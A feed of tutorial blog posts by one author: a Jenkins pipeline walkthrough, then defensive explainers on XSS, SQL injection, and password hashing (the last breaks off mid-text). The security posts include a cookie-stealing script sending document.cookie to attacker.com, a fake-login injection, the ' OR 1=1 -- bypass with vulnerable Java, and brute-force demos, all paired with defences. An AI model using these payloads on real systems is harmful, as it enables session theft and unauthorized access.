<pre class="highlight shell"><code><span class="nb">sudo cat</span> /var/lib/jenkins/secrets/initialAdminPassword </code></pre> </div> <p>Copy the password and complete the Jenkins setup wizard.</p> <h2> Project Structure </h2> <p>The project is intentionally very small.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>calculator-app/ │ ├── src/ │ └── Main.java │ └── Jenkinsfile </code></pre> </div> <h2> Java Application </h2> <p>Create:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/Main.java </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kd">public</span> <span class="kd">class</span> <span class="nc">Main</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">a</span> <span class="o">=</span> <span class="mi">10</span><span class="o">;</span> <span class="kt">int</span> <span class="n">b</span> <span class="o">=</span> <span class="mi">20</span><span class="o">;</span> <span class="kt">int</span> <span class="n">sum</span> <span class="o">=</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span><span class="o">;</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Sum = "</span> <span class="o">+</span> <span class="n">sum</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>When executed:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Sum = 30 </code></pre> </div> <p>Although the application is tiny, it exercises the same Jenkins concepts used in larger CI/CD pipelines.</p> <h2> Jenkins Pipeline </h2> <p>Create:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Jenkinsfile </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">pipeline</span> <span class="o">{</span> <span class="n">agent</span> <span class="n">any</span> <span class="n">stages</span> <span class="o">{</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Preparation'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Preparing build environment...'</span> <span class="o">}</span> <span class="o">}</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Compile'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">dir</span><span class="o">(</span><span class="s1">'/mnt/c/MyDomain/jenkin-work/apps/calculator-app'</span><span class="o">)</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Compiling Java program...'</span> <span class="n">sh</span> <span class="s1">'javac src/Main.java'</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Run Program'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">dir</span><span class="o">(</span><span class="s1">'/mnt/c/MyDomain/jenkin-work/apps/calculator-app'</span><span class="o">)</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Running Java program...'</span> <span class="n">sh</span> <span class="s1">'java -cp src Main &gt; output.txt'</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Archive Output'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">dir</span><span class="o">(</span><span class="s1">'/mnt/c/MyDomain/jenkin-work/apps/calculator-app'</span><span class="o">)</span> <span class="o">{</span> <span class="n">archiveArtifacts</span> <span class="nl">artifacts:</span> <span class="s1">'output.txt'</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Deploy Simulation'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Deploying application...'</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="n">post</span> <span class="o">{</span> <span class="n">success</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Pipeline executed successfully!'</span> <span class="o">}</span> <span class="n">failure</span> <span class="o">{</span> <span class="n">echo</span> <span class="s1">'Pipeline failed!'</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <blockquote> <p><strong>Note</strong></p> <p>For simplicity, this tutorial uses a hardcoded project path:</p> <pre class="highlight groovy"><code><span class="n">dir</span><span class="o">(</span><span class="s1">'/mnt/c/MyDomain/jenkin-work/apps/calculator-app'</span><span class="o">)</span> </code></pre> <p>This was intentionally done to demonstrate an important Jenkins workspace concept and keep the example lightweight.</p> <p>In real-world CI/CD pipelines, Jenkins typically checks out source code directly from a Git repository into its workspace.</p> <p>A more typical approach would look like:</p> <pre class="highlight groovy"><code><span class="n">stage</span><span class="o">(</span><span class="s1">'Checkout'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">git</span> <span class="s1">'https://github.com/your-username/calculator-app.git'</span> <span class="o">}</span> <span class="o">}</span> <span class="n">stage</span><span class="o">(</span><span class="s1">'Compile'</span><span class="o">)</span> <span class="o">{</span> <span class="n">steps</span> <span class="o">{</span> <span class="n">sh</span> <span class="s1">'javac src/Main.java'</span> <span class="o">}</span> <span class="o">}</span> </code></pre> <p>The purpose of this article is to focus on understanding pipeline execution, workspaces, artifacts, and build flow before introducing Git integration.</p> </blockquote> <h2> Understanding Each Stage </h2> <h3> Preparation </h3> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">echo</span> <span class="s1">'Preparing build environment...'</span> </code></pre> </div> <p>This stage simulates environment preparation.</p> <p>In larger projects, this could include:</p> <ul> <li>Loading credentials</li> <li>Installing dependencies</li> <li>Setting environment variables</li> </ul> <h3> Compile </h3> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">sh</span> <span class="s1">'javac src/Main.java'</span> </code></pre> </div> <p>Compiles the Java source code.</p> <p>If compilation fails, the pipeline stops immediately.</p> <h3> Run Program </h3> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">sh</span> <span class="s1">'java -cp src Main &gt; output.txt'</span> </code></pre> </div> <p>Executes the application and redirects the output to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>output.txt </code></pre> </div> <p>Contents:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Sum = 30 </code></pre> </div> <h3> Archive Output </h3> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">archiveArtifacts</span> <span class="nl">artifacts:</span> <span class="s1">'output.txt'</span> </code></pre> </div> <p>Stores the generated file inside Jenkins for later access.</p> <h3> Deploy Simulation </h3> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">echo</span> <span class="s1">'Deploying application...'</span> </code></pre> </div> <p>In a production pipeline, this stage could:</p> <ul> <li>Deploy Docker containers</li> <li>Copy files to servers</li> <li>Deploy applications to Kubernetes</li> <li>Restart services</li> </ul> <h2> Creating the Jenkins Pipeline Job </h2> <p>After logging into Jenkins:</p> <ol> <li>Click: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>New Item </code></pre> </div> <ol> <li>Enter: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>calculator-pipeline </code></pre> </div> <ol> <li>Select: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Pipeline </code></pre> </div> <ol> <li><p>Click <strong>OK</strong></p></li> <li><p>Under:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Definition </code></pre> </div> <p>Choose:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Pipeline Script </code></pre> </div> <ol> <li><p>Paste the Jenkinsfile content.</p></li> <li><p>Save.</p></li> <li><p>Click:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Build Now </code></pre> </div> <h2> CI/CD Flow Visualization </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Java Source Code │ ▼ Jenkins Pipeline Starts │ ▼ Compile │ ▼ Execute │ ▼ Generate Artifact │ ▼ Archive Artifact │ ▼ Post Actions </code></pre> </div> <p>Although this example is small, enterprise pipelines follow the same basic pattern.</p> <h2> Understanding Jenkins Workspaces </h2> <p>One of the most important Jenkins concepts is the workspace.</p> <p>When Jenkins executes a build, it typically runs inside:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/var/lib/jenkins/workspace/calculator-pipeline </code></pre> </div> <p>My initial build failed because Jenkins could not locate:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/Main.java </code></pre> </div> <p>The source code existed outside the Jenkins workspace.</p> <p>The solution was:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">dir</span><span class="o">(</span><span class="s1">'/mnt/c/MyDomain/jenkin-work/apps/calculator-app'</span><span class="o">)</span> <span class="o">{</span> <span class="n">sh</span> <span class="s1">'javac src/Main.java'</span> <span class="o">}</span> </code></pre> </div> <p>This temporarily changes the working directory before executing commands.</p> <p>Understanding workspaces will save significant debugging time when building larger pipelines.</p> <h2> Console Output </h2> <p>A successful build produced output similar to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Preparing build environment... Compiling Java program... Running Java program... Pipeline executed successfully! </code></pre> </div> <p>The Jenkins Console Output page is often the first place you'll inspect when troubleshooting build failures.</p> <h2> Generated Artifact </h2> <p>The pipeline generated:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>output.txt </code></pre> </div> <p>Contents:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Sum = 30 </code></pre> </div> <p>Real-world pipelines commonly generate:</p> <ul> <li>JAR files</li> <li>WAR files</li> <li>Test reports</li> <li>Coverage reports</li> <li>Docker images</li> <li>Deployment packages</li> </ul> <p>The concept remains identical.</p> <h2> The Most Important Lesson </h2> <p>💡 Key Takeaway</p> <p>Jenkins does not compile Java, build Docker images, or deploy applications itself.</p> <p>Jenkins is an automation server that orchestrates external tools and commands.</p> <p>Understanding this distinction is one of the most important concepts in DevOps and CI/CD.</p> <p>When Jenkins executes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">sh</span> <span class="s1">'javac src/Main.java'</span> </code></pre> </div> <p>it is simply asking the operating system to run the Java compiler.</p> <p>Likewise:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight groovy"><code><span class="n">sh</span> <span class="s1">'docker build .'</span> </code></pre> </div> <p>asks Docker to build an image.</p> <p>Jenkins orchestrates tools—it does not replace them.</p> <p>Understanding this distinction is fundamental to learning DevOps and CI/CD.</p> <h2> Future Enhancements </h2> <p>Once comfortable with this example, you can gradually introduce:</p> <ul> <li>Git integration</li> <li>Automatic build triggers</li> <li>Maven builds</li> <li>Unit testing</li> <li>Docker integration</li> <li>Tomcat deployment</li> <li>Kubernetes deployment</li> <li>Full CI/CD automation</li> </ul> <p>The core Jenkins concepts remain exactly the same.</p> <h2> Final Thoughts </h2> <p>Many engineers first encounter Jenkins through large enterprise pipelines that can feel intimidating.</p> <p>Starting with a tiny project makes the learning process much easier.</p> <p>A simple Java application is enough to understand:</p> <ul> <li>Pipeline stages</li> <li>Build execution</li> <li>Artifacts</li> <li>Workspaces</li> <li>Automation flow</li> </ul> <p>Once these fundamentals become clear, moving toward Docker, Kubernetes, and enterprise CI/CD becomes much more natural.</p> <p>Sometimes the best way to understand a large system is to begin with the smallest possible working example.</p> <p>If you're new to Jenkins, try building this example yourself before moving on to Maven, Docker, or Kubernetes. The concepts learned here will transfer directly to larger CI/CD pipelines.</p> jenkins devops cicd java XSS Explained: How Attackers Execute JavaScript Inside Your Application Sanjay Ghosh Tue, 05 May 2026 22:30:33 +0000 https://dev.to/sanjayghosh/xss-explained-how-attackers-execute-javascript-inside-your-application-5fc6 https://dev.to/sanjayghosh/xss-explained-how-attackers-execute-javascript-inside-your-application-5fc6 <h3> Hook </h3> <p>What if an attacker could execute JavaScript inside your users’ browsers — using nothing more than a comment box?<br> That’s exactly what Cross-Site Scripting (XSS) enables.</p> <p>Let’s break down how this actually happens in real applications.</p> <h3> What is XSS? </h3> <p>The flow of a typical XSS attack is illustrated above.</p> <p>Cross-Site Scripting happens when an application renders untrusted user input directly into a web page.<br> Instead of displaying the input as plain text, the browser interprets it as executable JavaScript.</p> <p>This allows attackers to run malicious code in another user’s browser — under your application’s trusted domain.</p> <h3> Types of XSS </h3> <p>✔ Stored XSS<br> Attacker submits malicious input.<br> Application stores it in database.<br> Every user who loads the page executes it.</p> <p>Example scenario:<br> Comment section<br> ✔ Reflected XSS<br> Input comes from request (URL/form)<br> Reflected immediately</p> <p>Example:<br> Search page<br> ✔ DOM-based XSS <br> No server involvement.<br> Client-side JavaScript inserts attacker-controlled data into DOM.<br> While these types differ in how the payload is delivered, the core issue is the same: untrusted input is executed as code.</p> <h3> Practical Example </h3> <p>❌ Vulnerable Example (Java/JSP)<br> <code>String comment = request.getParameter("comment");<br> saveComment(comment);</code><br> Later Rendered:<br> <code>&lt;div&gt;&lt;%= comment %&gt;&lt;/div&gt;</code><br> The application assumes the comment is harmless text.<br> But the browser has no way to know that.</p> <p>💥 Attack Input<br> <code>&lt;script&gt;alert('XSS')&lt;/script&gt;</code><br> When rendered:<br> <code>&lt;div&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;/div&gt;</code></p> <p>Browser executes it.<br> The browser has no way to distinguish between legitimate code and attacker-injected code.<br> Instead of displaying text, the browser executes JavaScript.</p> <h3> Escalate Attack (Attacker Mindset) </h3> <h4> Cookie Theft Example </h4> <p><code>&lt;script&gt;<br> fetch("https://attacker.com/steal?cookie=" + document.cookie);<br> &lt;/script&gt;</code><br> This sends victim session cookies to attacker.<br> If session cookies are not protected, attacker may hijack active sessions.<br> This works because browsers automatically include cookies with requests to the same domain.</p> <h4> Fake Login Form </h4> <p><code>&lt;script&gt;<br> document.body.innerHTML =<br> '&lt;h2&gt;Session Expired&lt;/h2&gt;&lt;input placeholder="Password"&gt;';<br> &lt;/script&gt;</code><br> Attacker replaces page content with fake UI.<br> Users unknowingly enter credentials.</p> <h3> Real Impact </h3> <h4> Session hijacking </h4> <p>Attacker steals authenticated session.</p> <h4> Account takeover </h4> <p>Victim account accessed without password.</p> <h3> Data theft </h3> <p>Sensitive page data can be extracted.</p> <p>Phishing inside app<br> This is especially dangerous because users trust your domain.<br> Users are far more likely to trust fake prompts when they appear inside a legitimate application they already trust.</p> <p>The dangerous part about XSS is that it doesn’t attack your backend — it exploits the trust between your application and your users.</p> <h3> How to Prevent XSS </h3> <h4> ✅ Output Encoding </h4> <p>Escape special characters<br> Convert &lt; →&amp;lt;<br> 👉 Key idea:<br> Treat user input as data, not HTML<br> Unsafe:<br> <code>&lt;div&gt;&lt;%= userInput %&gt;&lt;/div&gt;</code></p> <p>Safe:<br> <code>&lt;div&gt;&lt;c:out value="${userInput}" /&gt;&lt;/div&gt;</code></p> <p>Special characters become text:<br> <code>&lt;script&gt;</code> becomes visible text instead of executable code.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Method</th> <th>Browser Sees (Source Code)</th> <th>Browser Does</th> </tr> </thead> <tbody> <tr> <td><code>&lt;c:out&gt;</code></td> <td><code>&amp;lt;script&amp;gt;evil()&amp;lt;/script&amp;gt;</code></td> <td>Displays literal text on screen.</td> </tr> <tr> <td><code>&lt;%= %&gt;</code></td> <td><code>&lt;script&gt;evil()&lt;/script&gt;</code></td> <td>Executes the script immediately.</td> </tr> </tbody> </table></div> <h4> ✅ Framework Protection </h4> <p>Modern frameworks escape by default.<br> React (safe)<br> <code>&lt;div&gt;{userInput}&lt;/div&gt;<br> </code><br> Dangerous<br> <code>&lt;div dangerouslySetInnerHTML={{ __html: userInput }} /&gt;</code></p> <p>Usually, when you render data in React using curly braces {userContent}, React automatically escapes the content. This means it treats everything—including HTML tags—as literal text, preventing malicious scripts from executing.</p> <p>When you use dangerouslySetInnerHTML, you are telling React to skip that protection and inject the raw string directly into the DOM</p> <p>✅ ####Content Security Policy<br> Restrict script execution<br> <code>Content-Security-Policy: default-src 'self'; script-src 'self';</code><br> Even if script injection happens, browser blocks unauthorized script execution.</p> <h3> Common Mistakes </h3> <h4> Trusting user input </h4> <p>Never assume users behave correctly.</p> <h4> Using innerHTML </h4> <p>Unsafe:<br> <code>element.innerHTML = userInput;</code><br> Safe:<br> <code>element.textContent = userInput;</code></p> <h4> Disabling escaping </h4> <p>Framework protections exist for a reason.</p> <h3> Final Thoughts </h3> <h4> Think like an attacker: </h4> <p>Ask:</p> <ul> <li>Can I inject script here?</li> <li>Will the browser execute it?</li> <li>Can I steal trust from this page?</li> </ul> <p>XSS is dangerous because it doesn’t attack your server directly — it attacks your users through your application.</p> <p>If your application renders user input without proper encoding, you’re handing attackers control of your users’ browsers.</p> <p>In XSS, the attacker doesn’t break your system — they use it against your users.</p> <p>Always treat user input as data — never as code.</p> cybersecurity websecurity javascript xss SQL Injection Explained: How Hackers Bypass Login Forms (and How to Stop Them) Sanjay Ghosh Sat, 25 Apr 2026 03:46:21 +0000 https://dev.to/sanjayghosh/sql-injection-explained-how-hackers-bypass-login-forms-and-how-to-stop-them-1gll https://dev.to/sanjayghosh/sql-injection-explained-how-hackers-bypass-login-forms-and-how-to-stop-them-1gll <p>Even today, a single poorly written SQL query can allow an attacker to bypass authentication or expose sensitive data.</p> <p>And the scary part? It often comes down to just one line of code.</p> <p>In the previous articles, we saw how small implementation decisions can introduce serious vulnerabilities. SQL Injection is one of the clearest examples of this—simple to understand, yet still widely exploited.</p> <h3> What is SQL Injection? </h3> <p>SQL Injection occurs when <strong>untrusted user input is included directly in a SQL query</strong>.</p> <p>Instead of being treated as data, the input is interpreted as part of the SQL command itself. This allows attackers to manipulate queries and control how the database behaves.</p> <h3> How SQL Injection Works </h3> <p>Consider a typical login query:<br> <code>SELECT * FROM users <br> WHERE username = 'input' AND password = 'input';</code><br> The application expects input to be normal user data.</p> <p>But what if an attacker provides this instead?<br> <code>' OR 1=1 --</code></p> <ul> <li>OR 1=1 → always true</li> <li>-- → comments out the rest of the query 👉 The database ends up executing a modified query that ignores authentication checks.</li> </ul> <h4> A Simple Login Bypass Example (Java) </h4> <p>Let’s look at how this vulnerability often appears in real code.</p> <h4> ❌ Vulnerable Implementation </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">String</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"username"</span><span class="o">);</span> <span class="nc">String</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"password"</span><span class="o">);</span> <span class="nc">String</span> <span class="n">query</span> <span class="o">=</span> <span class="s">"SELECT * FROM users WHERE username = '"</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="s">"' AND password = '"</span> <span class="o">+</span> <span class="n">password</span> <span class="o">+</span> <span class="s">"'"</span><span class="o">;</span> <span class="nc">Statement</span> <span class="n">stmt</span> <span class="o">=</span> <span class="n">connection</span><span class="o">.</span><span class="na">createStatement</span><span class="o">();</span> <span class="nc">ResultSet</span> <span class="n">rs</span> <span class="o">=</span> <span class="n">stmt</span><span class="o">.</span><span class="na">executeQuery</span><span class="o">(</span><span class="n">query</span><span class="o">);</span> </code></pre> </div> <h4> ⚠️ What’s the problem? </h4> <ul> <li>User input is directly concatenated into the SQL query</li> <li>No separation between <strong>code</strong> and <strong>data</strong> </li> <li>The database cannot distinguish between intended query logic and attacker input</li> </ul> <h4> 💥 Attack Input </h4> <p><code>username: admin<br> password: ' OR 1=1 --</code></p> <h4> 💣 Resulting Query </h4> <p><code>SELECT * FROM users <br> WHERE username = 'admin' AND password = '' OR 1=1 --'</code><br> 👉 The condition OR 1=1 is always true, so the query returns results regardless of the password.</p> <p><strong>Result</strong>: Authentication is bypassed.</p> <h4> Real-World Impact </h4> <p>SQL Injection is not just theoretical—it can lead to serious consequences:</p> <ul> <li>Unauthorized login (authentication bypass)</li> <li>Exposure of sensitive data</li> <li>Modification or deletion of database records</li> <li>Full database compromise</li> </ul> <h4> How to Prevent SQL Injection </h4> <p>Preventing SQL Injection is straightforward—but only if done correctly.</p> <h4> ✅ 1. Use Prepared Statements (Java) </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">String</span> <span class="n">query</span> <span class="o">=</span> <span class="s">"SELECT * FROM users WHERE username = ? AND password = ?"</span><span class="o">;</span> <span class="nc">PreparedStatement</span> <span class="n">pstmt</span> <span class="o">=</span> <span class="n">connection</span><span class="o">.</span><span class="na">prepareStatement</span><span class="o">(</span><span class="n">query</span><span class="o">);</span> <span class="n">pstmt</span><span class="o">.</span><span class="na">setString</span><span class="o">(</span><span class="mi">1</span><span class="o">,</span> <span class="n">username</span><span class="o">);</span> <span class="n">pstmt</span><span class="o">.</span><span class="na">setString</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">password</span><span class="o">);</span> <span class="nc">ResultSet</span> <span class="n">rs</span> <span class="o">=</span> <span class="n">pstmt</span><span class="o">.</span><span class="na">executeQuery</span><span class="o">();</span> </code></pre> </div> <p>👉 Why this works:</p> <ul> <li>Query structure is fixed</li> <li>User input is treated strictly as data, not executable SQL</li> </ul> <h4> ✅ 2. Use ORM Frameworks (JPA / Hibernate) </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">User</span> <span class="n">user</span> <span class="o">=</span> <span class="n">userRepository</span><span class="o">.</span><span class="na">findByUsernameAndPassword</span><span class="o">(</span><span class="n">username</span><span class="o">,</span> <span class="n">password</span><span class="o">);</span> </code></pre> </div> <p>👉 ORMs generate parameterized queries internally, which helps reduce the risk of SQL injection when used correctly.</p> <h4> ✅ 3. Input Validation (Defense-in-Depth) </h4> <p>Limit input length<br> Restrict allowed characters</p> <p>⚠️ Important: Input validation alone is not sufficient to prevent SQL Injection.<br> Most SQL injection vulnerabilities don’t happen because developers don’t know about them — they happen because of small shortcuts taken under time pressure.</p> <h4> ✅ 4. Principle of Least Privilege </h4> <p>Database users should have only the permissions they need<br> Avoid using admin/root credentials for application access</p> <h4> Common Mistakes to Avoid </h4> <ul> <li>Relying only on input validation</li> <li>Manually escaping strings instead of using parameterized queries</li> <li>Trusting frontend validation</li> <li>Logging raw queries with sensitive data</li> </ul> <h4> Final Thoughts </h4> <p>SQL Injection isn’t a complex attack—it’s usually the result of a simple coding mistake.</p> <p>But its impact can be severe.</p> <p>As a developer, the takeaway is clear:<br> 👉 Never trust user input<br> 👉 Always separate data from code</p> <p>Small decisions in how you write queries can determine whether your application is secure—or completely exposed.</p> security cybersecurity webdev sql Authentication Security Deep Dive: From Brute Force to Salted Hashing (With Java Examples) Sanjay Ghosh Sun, 19 Apr 2026 18:54:23 +0000 https://dev.to/sanjayghosh/authentication-security-deep-dive-from-brute-force-to-salted-hashing-with-java-examples-mc8 https://dev.to/sanjayghosh/authentication-security-deep-dive-from-brute-force-to-salted-hashing-with-java-examples-mc8 <p>What if I told you that even if you hash passwords, an attacker might still crack them in seconds?</p> <p>Authentication is one of the most critical parts of any application—and also one of the most misunderstood.</p> <p>In this post, we’ll think like an attacker, break insecure implementations using Java examples, and then progressively strengthen our defenses using <strong>hashing and salting</strong>.<br> If you’ve ever stored a password using only hashing, your system may still be vulnerable.</p> <h3> 🧠 1. Why Authentication Security Matters </h3> <p>When authentication fails, everything fails:</p> <ul> <li>Account takeover</li> <li>Data breaches</li> <li>Privilege escalation</li> </ul> <p>To build secure systems, we must first understand how attackers operate.</p> <h3> ⚔️ 2. How Attackers Break Authentication </h3> <h4> (i). Brute Force Attack </h4> <p>Attacker tries all possible passwords until one works.<br> 👉 Works because:</p> <ul> <li>Users choose weak passwords</li> <li>Systems don’t limit attempts</li> </ul> <h4> (ii). Dictionary Attack </h4> <p>Instead of all combinations, attacker uses a list of common passwords:<br> <code>123456<br> password<br> admin<br> welcome123</code></p> <h4> (iii). Rainbow Table Attack </h4> <p>Attacker precomputes hashes:<br> <code>password → hash1<br> admin → hash2</code><br> Then instantly matches stolen hashes.<br> 👉 Extremely fast if no salt is used</p> <h4> (iv). Session Attacks (brief) </h4> <p>Focus on hijacking authenticated sessions (cookies, tokens).<br> 👉 Important, but outside this blog’s main focus.</p> <h3> 🔴 3. Thinking Like an Attacker: Breaking Weak Authentication </h3> <h4> 3.1 Brute Force Simulation (Java) </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.auth</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">BruteForceDemo</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">actualPassword</span> <span class="o">=</span> <span class="s">"1234"</span><span class="o">;</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">9999</span><span class="o">;</span> <span class="n">i</span><span class="o">++)</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">guess</span> <span class="o">=</span> <span class="nc">String</span><span class="o">.</span><span class="na">format</span><span class="o">(</span><span class="s">"%04d"</span><span class="o">,</span> <span class="n">i</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Trying: "</span> <span class="o">+</span> <span class="n">guess</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">guess</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">actualPassword</span><span class="o">))</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"==&gt; Password found: "</span> <span class="o">+</span> <span class="n">guess</span><span class="o">);</span> <span class="k">break</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 This works because:</p> <ul> <li>Password is short and predictable</li> <li>No rate limiting</li> </ul> <h4> 3.2 Hashing Alone is NOT Enough </h4> <p>Let’s say system stores:<br> <code>hash(password)</code><br> <strong>Java Example</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.auth</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.MessageDigest</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">HashAttackDemo</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">hash</span><span class="o">(</span><span class="nc">String</span> <span class="n">input</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">MessageDigest</span> <span class="n">md</span> <span class="o">=</span> <span class="nc">MessageDigest</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"SHA-256"</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">digest</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="na">digest</span><span class="o">(</span><span class="n">input</span><span class="o">.</span><span class="na">getBytes</span><span class="o">());</span> <span class="nc">StringBuilder</span> <span class="n">hex</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringBuilder</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">byte</span> <span class="n">b</span> <span class="o">:</span> <span class="n">digest</span><span class="o">)</span> <span class="o">{</span> <span class="n">hex</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="nc">String</span><span class="o">.</span><span class="na">format</span><span class="o">(</span><span class="s">"%02x"</span><span class="o">,</span> <span class="n">b</span><span class="o">));</span> <span class="o">}</span> <span class="k">return</span> <span class="n">hex</span><span class="o">.</span><span class="na">toString</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">storedHash</span> <span class="o">=</span> <span class="n">hash</span><span class="o">(</span><span class="s">"password"</span><span class="o">);</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">guesses</span> <span class="o">=</span> <span class="o">{</span><span class="s">"123456"</span><span class="o">,</span> <span class="s">"password"</span><span class="o">,</span> <span class="s">"admin"</span><span class="o">};</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">guess</span> <span class="o">:</span> <span class="n">guesses</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">hash</span><span class="o">(</span><span class="n">guess</span><span class="o">).</span><span class="na">equals</span><span class="o">(</span><span class="n">storedHash</span><span class="o">))</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"==&gt; Cracked: "</span> <span class="o">+</span> <span class="n">guess</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 Even though password is 